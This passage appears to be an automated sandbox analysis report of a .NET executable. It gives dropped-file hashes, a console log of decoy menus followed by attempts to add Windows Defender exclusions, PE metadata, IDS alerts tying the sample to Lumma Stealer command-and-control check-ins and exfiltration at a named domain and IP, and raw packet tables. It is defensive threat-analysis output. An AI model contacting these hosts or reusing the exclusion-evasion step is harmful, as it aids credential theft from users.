SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ncja2tgz.kc0.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r3rtzpbz.xok.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vszyjc0t.wog.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wr5worfc.fny.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yvpfvf34.2ym.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zvoo4mpq.v1s.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

\Device\ConDrv

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2024
Entropy (8bit):	4.670775491774205
Encrypted:	false
SSDEEP:	48:BQGm4QQ1Py/sQGm4QQ1PybQYm4QQ1PyJpjQGm4QQ1PyMQGm4QQ1PyPO1pO:BcdYcdvKdjcdYcdmpO
MD5:	95E1232207FE49BA6D716AEFA72F9241
SHA1:	3A4B1B7E12B35155B886483E8399055A04732371
SHA-256:	EBE9519C9C62A8DCC8F244B9C7E638B9333AA18A124092048E1A2C2781F6E4B9
SHA-512:	2590E2FE9C853C1892A4D55E6EE506EA631E1562CC7BA69E6FA9BC7537BA18280F3D7AD0CBAD8D938CE8F7CF09F7B20397249ECF39AFEE2A00CBAB1EF3EA1344
Malicious:	false
Preview:	Choose a task (1-5) within 2 seconds:..1. Calculate the sum of the first n natural numbers...2. Calculate the nth Fibonacci number...3. Calculate the greatest common divisor (GCD) of two numbers...4. Calculate the least common multiple (LCM) of two numbers...5. Calculate the sum of the digits of a number...No task selected within 2 seconds. Creating folder 'Jiras' on C: drive...Folder 'Lipras' created on C: drive...Choose a task (1-5) within 2 seconds:..1. Calculate the sum of the first n natural numbers...2. Calculate the nth Fibonacci number...3. Calculate the greatest common divisor (GCD) of two numbers...4. Calculate the least common multiple (LCM) of two numbers...5. Calculate the sum of the digits of a number...No task selected within 2 seconds. Adding folders to Windows Defender exclusions...Failed to add folders to Windows Defender exclusions...Choose a task (1-5) within 4 seconds:..1. Calculate the sum of the first n natural numbers...2. Calculate the nth Fibonacci number...3.

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.1128773458106895
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	file.exe
File size:	21'504 bytes
MD5:	3ba35e9d091539ec658813e3d15e4b89
SHA1:	3baf91a24418399f05d99206f8f004ae48d6a134
SHA256:	aa133af788a57f91449a01402067a28f744172154f3a5d3f8d0d47f350037ec8
SHA512:	a815b64909b9a81c39385c98f00666644d9f0281dcf53582752f84da1eaab3a76fb16d76ff4b47057bab0a9249eb3263bf7fecf88a554daa986c8935281393cd
SSDEEP:	384:De2H2+gWWU6bLUcodtnbQCZhytY6Zqk0U8eaNa2fr964/wVZoJAn:Z20r6HUckbQCamuaNa2fr964oroa
TLSH:	FBA2B68893FC8513E7FF7F3C59B542664BB0BD23AC31E30D0289919E195675588A8BB3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..J...........h... ........@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x40689a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xA794DF11 [Tue Feb 4 02:31:45 2059 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6846	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8000	0x59c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x67b4	0x38	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x48a0	0x4a00	cba898689a3fb2c50ed619204b159f63	False	0.38561021959459457	data	5.2981418955836395	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x8000	0x59c	0x600	7d28c833fdede624cbdc8857e1f43c2c	False	0.4088541666666667	data	4.024976073673193	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa000	0xc	0x200	3b844f190f3e6d58d72df6134f8543dc	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x8090	0x30c	data			0.41923076923076924
RT_MANIFEST	0x83ac	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-29T22:04:22.292432+0100	2057093	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (seallysl .site)	1	192.168.2.4	49856	1.1.1.1	53	UDP
2024-10-29T22:04:22.986375+0100	2057094	ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI)	1	192.168.2.4	49738	172.67.180.76	443	TCP
2024-10-29T22:04:23.500292+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49738	172.67.180.76	443	TCP
2024-10-29T22:04:23.500292+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49738	172.67.180.76	443	TCP
2024-10-29T22:04:24.179898+0100	2057094	ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI)	1	192.168.2.4	49739	172.67.180.76	443	TCP
2024-10-29T22:04:24.909395+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49739	172.67.180.76	443	TCP
2024-10-29T22:04:24.909395+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49739	172.67.180.76	443	TCP
2024-10-29T22:04:25.771066+0100	2057094	ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI)	1	192.168.2.4	49740	172.67.180.76	443	TCP
2024-10-29T22:04:31.448651+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49740	172.67.180.76	443	TCP
2024-10-29T22:04:32.201272+0100	2057094	ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI)	1	192.168.2.4	49741	172.67.180.76	443	TCP
2024-10-29T22:04:33.597292+0100	2057094	ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI)	1	192.168.2.4	49742	172.67.180.76	443	TCP
2024-10-29T22:04:38.293697+0100	2057094	ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI)	1	192.168.2.4	49743	172.67.180.76	443	TCP
2024-10-29T22:04:43.432466+0100	2057094	ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI)	1	192.168.2.4	49744	172.67.180.76	443	TCP
2024-10-29T22:04:50.251549+0100	2057094	ET MALWARE Observed Win32/Lumma Stealer Related Domain (seallysl .site in TLS SNI)	1	192.168.2.4	49745	172.67.180.76	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 29, 2024 22:04:13.246045113 CET	49730	443	192.168.2.4	140.82.121.4
Oct 29, 2024 22:04:13.246088028 CET	443	49730	140.82.121.4	192.168.2.4
Oct 29, 2024 22:04:13.246176958 CET	49730	443	192.168.2.4	140.82.121.4
Oct 29, 2024 22:04:13.257160902 CET	49730	443	192.168.2.4	140.82.121.4
Oct 29, 2024 22:04:13.257174969 CET	443	49730	140.82.121.4	192.168.2.4
Oct 29, 2024 22:04:14.116744041 CET	443	49730	140.82.121.4	192.168.2.4
Oct 29, 2024 22:04:14.116842985 CET	49730	443	192.168.2.4	140.82.121.4
Oct 29, 2024 22:04:14.119616032 CET	49730	443	192.168.2.4	140.82.121.4
Oct 29, 2024 22:04:14.119626999 CET	443	49730	140.82.121.4	192.168.2.4
Oct 29, 2024 22:04:14.119949102 CET	443	49730	140.82.121.4	192.168.2.4
Oct 29, 2024 22:04:14.173310995 CET	49730	443	192.168.2.4	140.82.121.4
Oct 29, 2024 22:04:14.198755026 CET	49730	443	192.168.2.4	140.82.121.4
Oct 29, 2024 22:04:14.243330002 CET	443	49730	140.82.121.4	192.168.2.4
Oct 29, 2024 22:04:14.762756109 CET	443	49730	140.82.121.4	192.168.2.4
Oct 29, 2024 22:04:14.762974024 CET	443	49730	140.82.121.4	192.168.2.4
Oct 29, 2024 22:04:14.763051987 CET	49730	443	192.168.2.4	140.82.121.4
Oct 29, 2024 22:04:14.763075113 CET	443	49730	140.82.121.4	192.168.2.4
Oct 29, 2024 22:04:14.763119936 CET	443	49730	140.82.121.4	192.168.2.4
Oct 29, 2024 22:04:14.763168097 CET	49730	443	192.168.2.4	140.82.121.4
Oct 29, 2024 22:04:14.772483110 CET	49730	443	192.168.2.4	140.82.121.4
Oct 29, 2024 22:04:14.784173012 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:14.784276962 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:14.784420967 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:14.784770012 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:14.784809113 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.435462952 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.435539007 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:15.438221931 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:15.438246012 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.438514948 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.440057993 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:15.487334013 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.741054058 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.741121054 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.741152048 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.741182089 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.741188049 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:15.741214037 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.741235971 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:15.741259098 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.741290092 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:15.741297007 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.741353035 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.741393089 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:15.741400003 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.782659054 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:15.782668114 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.829533100 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:15.864835024 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.865057945 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.865149021 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.865150928 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:15.865190029 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.865289927 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:15.865298986 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.865473986 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.865550041 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:15.865569115 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.865869999 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.865942001 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:15.865951061 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.866652012 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.866714001 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:15.866724014 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.866821051 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.866877079 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:15.866885900 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.867413044 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.867470980 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:15.867480040 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.867572069 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.867655993 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.867711067 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:15.867728949 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.867765903 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:15.868278027 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.868458033 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.868508101 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:15.868515968 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.923330069 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:15.988140106 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.988323927 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.988390923 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:15.988408089 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.988434076 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.988475084 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:15.988519907 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.990462065 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.990479946 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.990515947 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:15.990518093 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.990535975 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.990550041 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:15.990559101 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.990567923 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:15.990581989 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.990586996 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:15.990600109 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:15.990636110 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:15.992340088 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.992356062 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.992408037 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:15.992424011 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:15.992492914 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.111227036 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.111287117 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.111331940 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.111331940 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.111358881 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.111404896 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.111891985 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.111943960 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.111965895 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.111985922 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.112010956 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.112032890 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.112356901 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.112412930 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.112445116 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.112458944 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.112482071 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.112520933 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.113060951 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.113101959 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.113132954 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.113147974 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.113173962 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.113190889 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.234653950 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.234716892 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.234761000 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.234800100 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.234827042 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.235085964 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.235137939 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.235146999 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.235167980 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.235198021 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.235219002 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.235747099 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.235797882 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.235830069 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.235847950 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.235871077 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.235896111 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.239582062 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.239633083 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.239675045 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.239689112 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.239717007 CET	49731	443	192.168.2.4	185.199.109.133
